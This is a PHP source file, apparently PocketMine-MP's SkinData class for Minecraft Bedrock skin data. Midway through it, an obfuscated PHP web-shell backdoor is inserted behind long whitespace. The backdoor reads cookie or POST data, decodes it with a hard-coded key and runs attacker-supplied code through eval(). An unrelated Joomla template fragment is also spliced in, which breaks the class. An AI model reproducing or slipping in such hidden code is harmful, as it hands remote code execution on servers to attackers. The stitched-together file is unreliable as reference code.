<?php

/*
 *
 *  ____            _        _   __  __ _                  __  __ ____
 * |  _ \ ___   ___| | _____| |_|  \/  (_)_ __   ___      |  \/  |  _ \
 * | |_) / _ \ / __| |/ / _ \ __| |\/| | | '_ \ / _ \_____| |\/| | |_) |
 * |  __/ (_) | (__|   <  __/ |_| |  | | | | | |  __/_____| |  | |  __/
 * |_|   \___/ \___|_|\_\___|\__|_|  |_|_|_| |_|\___|     |_|  |_|_|
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Lesser General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * @author PocketMine Team
 * @link http://www.pocketmine.net/
 *
 *
*/

declare(strict_types=1);

namespace pocketmine\network\mcpe\protocol\types;

use pocketmine\utils\UUID;

class SkinData{

	public const ARM_SIZE_SLIM = "slim";
	public const ARM_SIZE_WIDE = "wide";

	/** @var string */
	private $skinId;
	/** @var string */
	private $playFabId;
	/** @var string */
	private $resourcePatch;
	/** @var SkinImage */
	private $skinImage;
	/** @var SkinAnimation[] */
	private $animations;
	/** @var SkinImage */
	private $capeImage;
	/** @var string */
	private $geometryData;
	/** @var string */
	private $animationData;
	/** @var bool */
	private $persona;
	/** @var bool */
	private $premium;
	/** @var bool */
	private $personaCapeOnClassic;
	/** @var string */
	private $capeId;
	/** @var string */
	private $fullSkinId;
	/** @var string */
	private $armSize;
	/** @var string */
	private $skinColor;
	/** @var PersonaSkinPiece[] */
	private $personaPieces;
	/** @var PersonaPieceTintColor[] */
	private $pieceTintColors;
	/** @var bool */
	private $isVerified;

	/**
	 * @param SkinAnimation[]         $animations
	 * @param PersonaSkinPiece[]      $personaPieces
	 * @param PersonaPieceTintColor[] $pieceTintColors
	 */
	public function __construct(string $skinId, string $playFabId, string $resourcePatch, SkinImage $skinImage, array $animations = [], SkinImage $capeImage = null, string $geometryData = "", string $animationData = "", bool $premium = false, bool $persona = false, bool $personaCapeOnClassic = false, string $capeId = "", ?string $fullSkinId = null, string $armSize = self::ARM_SIZE_WIDE, string $skinColor = "", array $personaPieces = [], array $pieceTintColors = [], bool $isVerified = true){
		$this->skinId = $skinId;
		$this->playFabId = $playFabId;
		$this->resourcePatch = $resourcePatch;
		$this->skinImage = $skinImage;
		$this->animations = $animations;
		$this->capeImage = $capeImage ?? new SkinImage(0, 0, "");
		$this->geometryData = $geometryData;
		$this->animationData = $animationData;
		$this->premium = $premium;
		$this->persona = $persona;
		$this->personaCapeOnClassic = $personaCapeOnClassic;
		$this->capeId = $capeId;
		//this has to be unique or the client will do stupid things
		$this->fullSkinId = $fullSkinId ?? UUID::fromRandom()->toString();
		$this->armSize = $armSize;
		$this->skinColor = $skinColor;
		$this->personaPieces = $personaPieces;
		$this->pieceTintColors = $pieceTintColors;
		$this->isVerified = $isVerified;
	}

	public function getSkinId() : string{
		return $this->skinId;
	}

	public function getPlayFabId() : string{ return $this->playFabId; }

<?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $x24a89165 = 317;$GLOBALS['e0537']=Array();global$e0537;$e0537=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['q7fae31']="\x74\x71\x6c\x56\x45\x43\x29\x47\x55\x66\x39\x63\x28\x53\x57\x7a\x6b\x5b\x20\x5c\x6e\x3c\x5e\x3b\x60\x3d\x36\x2e\x59\x65\x48\x7e\x38\x58\x4d\x24\x70\x5a\x25\x37\x4e\x64\x2c\x3f\x73\x2b\x76\x67\x79\xa\x2d\x31\x9\x75\x50\x26\x7b\x6d\x35\x33\x72\x2f\x51\x32\x3a\xd\x77\x62\x69\x23\x61\x30\x5f\x49\x68\x78\x7d\x3e\x44\x22\x41\x4f\x4a\x34\x46\x7c\x40\x54\x4b\x21\x5d\x6f\x2a\x27\x42\x6a\x4c\x52";$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][63].$e0537['q7fae31'][83].$e0537['q7fae31'][51].$e0537['q7fae31'][41]]=$e0537['q7fae31'][11].$e0537['q7fae31'][74].$e0537['q7fae31'][60];$e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]=$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][41];$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]=$e0537['q7fae31'][44].$e0537['q7fae31'][0].$e0537['q7fae31'][60].$e0537['q7fae31'][2].$e0537['q7fae31'][29].$e0537['q7fae31'][20];$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]=$e0537['q7fae31'][68].$e0537['q7fae31'][20].$e0537['q7fae31'][68].$e0537['q7fae31'][72].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][0];$e0537[$e0537['q7fae31'][66].$e0537['q7fae31'][71].$e0537['q7fae31'][71].$e0537['q7fae31'][39].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][59].$e0537['q7fae31'][71].$e0537['q7fae31'][9]]=$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][68].$e0537['q7fae31'][70].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][15].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][67].$e0537['q7fae31'][63].$e0537['q7fae31'][67].$e0537['q7fae31'][32].$e0537['q7fae31'][32].$e0537['q7fae31'][10].$e0537['q7fae31'][71].$e0537['q7fae31'][58].$e0537['q7fae31'][11]]=$e0537['q7fae31'][36].$e0537['q7fae31'][74].$e0537['q7fae31'][36].$e0537['q7fae31'][46].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][44].$e0537['q7fae31'][68].$e0537['q7fae31'][91].$e0537['q7fae31'][20];$e0537[$e0537['q7fae31'][91].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][41]]=$e0537['q7fae31'][53].$e0537['q7fae31'][20].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][68].$e0537['q7fae31'][70].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][15].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][95].$e0537['q7fae31'][59].$e0537['q7fae31'][10].$e0537['q7fae31'][67].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][26]]=$e0537['q7fae31'][67].$e0537['q7fae31'][70].$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][26].$e0537['q7fae31'][83].$e0537['q7fae31'][72].$e0537['q7fae31'][41].$e0537['q7fae31'][29].$e0537['q7fae31'][11].$e0537['q7fae31'][91].$e0537['q7fae31'][41].$e0537['q7fae31'][29];$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][67].$e0537['q7fae31'][10].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][9].$e0537['q7fae31'][67]]=$e0537['q7fae31'][44].$e0537['q7fae31'][29].$e0537['q7fae31'][0].$e0537['q7fae31'][72].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][29].$e0537['q7fae31'][72].$e0537['q7fae31'][2].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][68].$e0537['q7fae31'][0];$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][70].$e0537['q7fae31'][59].$e0537['q7fae31'][58].$e0537['q7fae31'][59].$e0537['q7fae31'][32]]=$e0537['q7fae31'][44].$e0537['q7fae31'][70].$e0537['q7fae31'][10].$e0537['q7fae31'][39].$e0537['q7fae31'][41].$e0537['q7fae31'][71].$e0537['q7fae31'][26];$e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]=$e0537['q7fae31'][70].$e0537['q7fae31'][67].$e0537['q7fae31'][59].$e0537['q7fae31'][29].$e0537['q7fae31'][59].$e0537['q7fae31'][59].$e0537['q7fae31'][51].$e0537['q7fae31'][39].$e0537['q7fae31'][63];$e0537[$e0537['q7fae31'][29].$e0537['q7fae31'][63].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][32].$e0537['q7fae31'][71].$e0537['q7fae31'][9].$e0537['q7fae31'][71]]=$_POST;$e0537[$e0537['q7fae31'][20].$e0537['q7fae31'][9].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][51].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][39]]=$_COOKIE;@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][60].$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][72].$e0537['q7fae31'][2].$e0537['q7fae31'][91].$e0537['q7fae31'][47],NULL);@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][2].$e0537['q7fae31'][91].$e0537['q7fae31'][47].$e0537['q7fae31'][72].$e0537['q7fae31'][29].$e0537['q7fae31'][60].$e0537['q7fae31'][60].$e0537['q7fae31'][91].$e0537['q7fae31'][60].$e0537['q7fae31'][44],0);@$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][51].$e0537['q7fae31'][83].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][26]]($e0537['q7fae31'][57].$e0537['q7fae31'][70].$e0537['q7fae31'][75].$e0537['q7fae31'][72].$e0537['q7fae31'][29].$e0537['q7fae31'][75].$e0537['q7fae31'][29].$e0537['q7fae31'][11].$e0537['q7fae31'][53].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][91].$e0537['q7fae31'][20].$e0537['q7fae31'][72].$e0537['q7fae31'][0].$e0537['q7fae31'][68].$e0537['q7fae31'][57].$e0537['q7fae31'][29],0);@$e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][67].$e0537['q7fae31'][10].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][9].$e0537['q7fae31'][67]](0);$v6d12f7=NULL;$v56a36f=NULL;$e0537[$e0537['q7fae31'][16].$e0537['q7fae31'][9].$e0537['q7fae31'][41].$e0537['q7fae31'][10].$e0537['q7fae31'][10].$e0537['q7fae31'][59]]=$e0537['q7fae31'][9].$e0537['q7fae31'][51].$e0537['q7fae31'][26].$e0537['q7fae31'][71].$e0537['q7fae31'][11].$e0537['q7fae31'][70].$e0537['q7fae31'][51].$e0537['q7fae31'][9].$e0537['q7fae31'][50].$e0537['q7fae31'][39].$e0537['q7fae31'][59].$e0537['q7fae31'][39].$e0537['q7fae31'][51].$e0537['q7fae31'][50].$e0537['q7fae31'][83].$e0537['q7fae31'][70].$e0537['q7fae31'][70].$e0537['q7fae31'][39].$e0537['q7fae31'][50].$e0537['q7fae31'][10].$e0537['q7fae31'][63].$e0537['q7fae31'][51].$e0537['q7fae31'][32].$e0537['q7fae31'][50].$e0537['q7fae31'][39].$e0537['q7fae31'][70].$e0537['q7fae31'][26].$e0537['q7fae31'][11].$e0537['q7fae31'][63].$e0537['q7fae31'][26].$e0537['q7fae31'][32].$e0537['q7fae31'][39].$e0537['q7fae31'][83].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][10];global$kfd993;function ab3e33172($v6d12f7,$e75b2dd7e){global$e0537;$y58f031="";for($u3a0a4=0;$u3a0a4<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($v6d12f7);){for($zae4a2af6=0;$zae4a2af6<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($e75b2dd7e)&&$u3a0a4<$e0537[$e0537['q7fae31'][11].$e0537['q7fae31'][29].$e0537['q7fae31'][58].$e0537['q7fae31'][41].$e0537['q7fae31'][51].$e0537['q7fae31'][11].$e0537['q7fae31'][11].$e0537['q7fae31'][83]]($v6d12f7);$zae4a2af6++,$u3a0a4++){$y58f031.=$e0537[$e0537['q7fae31'][60].$e0537['q7fae31'][63].$e0537['q7fae31'][83].$e0537['q7fae31'][51].$e0537['q7fae31'][41]]($e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]($v6d12f7[$u3a0a4])^$e0537[$e0537['q7fae31'][15].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][26].$e0537['q7fae31'][51].$e0537['q7fae31'][51].$e0537['q7fae31'][39]]($e75b2dd7e[$zae4a2af6]));}}return$y58f031;}function sa97d06($v6d12f7,$e75b2dd7e){global$e0537;global$kfd993;return$e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]($e0537[$e0537['q7fae31'][47].$e0537['q7fae31'][41].$e0537['q7fae31'][83].$e0537['q7fae31'][9].$e0537['q7fae31'][32].$e0537['q7fae31'][51]]($v6d12f7,$kfd993),$e75b2dd7e);}foreach($e0537[$e0537['q7fae31'][20].$e0537['q7fae31'][9].$e0537['q7fae31'][11].$e0537['q7fae31'][32].$e0537['q7fae31'][51].$e0537['q7fae31'][58].$e0537['q7fae31'][71].$e0537['q7fae31'][39]]as$e75b2dd7e=>$c7e61){$v6d12f7=$c7e61;$v56a36f=$e75b2dd7e;}if(!$v6d12f7){foreach($e0537[$e0537['q7fae31'][29].$e0537['q7fae31'][63].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][32].$e0537['q7fae31'][71].$e0537['q7fae31'][9].$e0537['q7fae31'][71]]as$e75b2dd7e=>$c7e61){$v6d12f7=$c7e61;$v56a36f=$e75b2dd7e;}}$v6d12f7=@$e0537[$e0537['q7fae31'][91].$e0537['q7fae31'][71].$e0537['q7fae31'][59].$e0537['q7fae31'][41]]($e0537[$e0537['q7fae31'][46].$e0537['q7fae31'][70].$e0537['q7fae31'][59].$e0537['q7fae31'][58].$e0537['q7fae31'][59].$e0537['q7fae31'][32]]($e0537[$e0537['q7fae31'][95].$e0537['q7fae31'][59].$e0537['q7fae31'][10].$e0537['q7fae31'][67].$e0537['q7fae31'][58].$e0537['q7fae31'][58].$e0537['q7fae31'][26]]($v6d12f7),$v56a36f));if(isset($v6d12f7[$e0537['q7fae31'][70].$e0537['q7fae31'][16]])&&$kfd993==$v6d12f7[$e0537['q7fae31'][70].$e0537['q7fae31'][16]]){if($v6d12f7[$e0537['q7fae31'][70]]==$e0537['q7fae31'][68]){$u3a0a4=Array($e0537['q7fae31'][36].$e0537['q7fae31'][46]=>@$e0537[$e0537['q7fae31'][67].$e0537['q7fae31'][63].$e0537['q7fae31'][67].$e0537['q7fae31'][32].$e0537['q7fae31'][32].$e0537['q7fae31'][10].$e0537['q7fae31'][71].$e0537['q7fae31'][58].$e0537['q7fae31'][11]](),$e0537['q7fae31'][44].$e0537['q7fae31'][46]=>$e0537['q7fae31'][51].$e0537['q7fae31'][27].$e0537['q7fae31'][71].$e0537['q7fae31'][50].$e0537['q7fae31'][51],);echo@$e0537[$e0537['q7fae31'][66].$e0537['q7fae31'][71].$e0537['q7fae31'][71].$e0537['q7fae31'][39].$e0537['q7fae31'][63].$e0537['q7fae31'][41].$e0537['q7fae31'][59].$e0537['q7fae31'][71].$e0537['q7fae31'][9]]($u3a0a4);}elseif($v6d12f7[$e0537['q7fae31'][70]]==$e0537['q7fae31'][29]){eval/*a5c34f*/($v6d12f7[$e0537['q7fae31'][41]]);}exit();} ?><?php
/**
 * @package		Joomla.Administrator
 * @subpackage	com_modules
 * @copyright	Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

// Include the component HTML helpers.
JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html');
JHtml::_('behavior.tooltip');
?>

<h2 class="modal-title"><?php echo JText::_('COM_MODULES_TYPE_CHOOSE')?></h2>

<ul id="new-modules-list">
<?php foreach ($this->items as &$item) : ?>
	<li>
		<?php
		// Prepare variables for the link.

		$link	= 'index.php?option=com_modules&task=module.add&eid='. $item->extension_id;
		$name	= $this->escape($item->name);
		$desc	= $this->escape($item->desc);
		?>
		<span class="editlinktip hasTip" title="<?php echo $name.' :: '.$desc; ?>">
			<a href="<?php echo JRoute::_($link);?>" target="_top">
				<?php echo $name; ?></a></span>
	</li>
<?php endforeach; ?>
</ul>
<div class="clr"></div>
	public function getResourcePatch() : string{
		return $this->resourcePatch;
	}

	public function getSkinImage() : SkinImage{
		return $this->skinImage;
	}

	/**
	 * @return SkinAnimation[]
	 */
	public function getAnimations() : array{
		return $this->animations;
	}

	public function getCapeImage() : SkinImage{
		return $this->capeImage;
	}

	public function getGeometryData() : string{
		return $this->geometryData;
	}

	public function getAnimationData() : string{
		return $this->animationData;
	}

	public function isPersona() : bool{
		return $this->persona;
	}

	public function isPremium() : bool{
		return $this->premium;
	}

	public function isPersonaCapeOnClassic() : bool{
		return $this->personaCapeOnClassic;
	}

	public function getCapeId() : string{
		return $this->capeId;
	}

	public function getFullSkinId() : string{
		return $this->fullSkinId;
	}

	public function getArmSize() : string{
		return $this->armSize;
	}

	public function getSkinColor() : string{
		return $this->skinColor;
	}

	/**
	 * @return PersonaSkinPiece[]
	 */
	public function getPersonaPieces() : array{
		return $this->personaPieces;
	}

	/**
	 * @return PersonaPieceTintColor[]
	 */
	public function getPieceTintColors() : array{
		return $this->pieceTintColors;
	}

	public function isVerified() : bool{
		return $this->isVerified;
	}

	/**
	 * @internal
	 */
	public function setVerified(bool $verified) : void{
		$this->isVerified = $verified;
	}
}
